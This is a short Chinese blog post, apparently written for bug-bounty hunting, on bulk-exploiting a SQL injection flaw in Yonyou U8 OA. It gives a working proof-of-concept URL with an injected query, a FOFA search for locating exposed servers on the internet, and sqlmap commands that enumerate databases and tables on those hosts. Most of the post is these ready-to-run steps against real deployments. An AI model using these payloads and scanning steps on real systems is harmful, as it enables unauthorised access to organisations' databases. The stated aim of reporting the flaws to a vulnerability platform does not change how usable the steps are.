vlambda博客
学习文章列表

fofa批量挖掘—用友 U8 OA SQL注入漏洞

fofa批量挖掘—用友 U8 OA SQL注入漏洞

 

1-漏洞POC

POC:http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

2-使用fofa搜索

title="用友U8-OA"

 


 

3-漏洞验证

打开fofa搜索到的资产,在url中拼接poc,使用sqlmap进行探测

 

fofa批量挖掘—用友 U8 OA SQL注入漏洞


 sqlmap语句:

c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --dbs

fofa批量挖掘—用友 U8 OA SQL注入漏洞

探测出数据库:

fofa批量挖掘—用友 U8 OA SQL注入漏洞

探测数据表:

c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --D information_schema  --tables


 探测出表名:


4-通过ip反查域名、通过站长工具查询出域名归属公司,通过天眼查查询公司详细信息,提交到漏洞盒子

 

 


推荐阅读

[5.05] 暗喻幻想港中35周年限定版1.03+DLC+金手指+王中王存档 [5.05] 暗喻幻想港中35周年限定版1.03+DLC+金手指+王中王存档
分库分表&百亿级数据迁移 分库分表&百亿级数据迁移

相关文章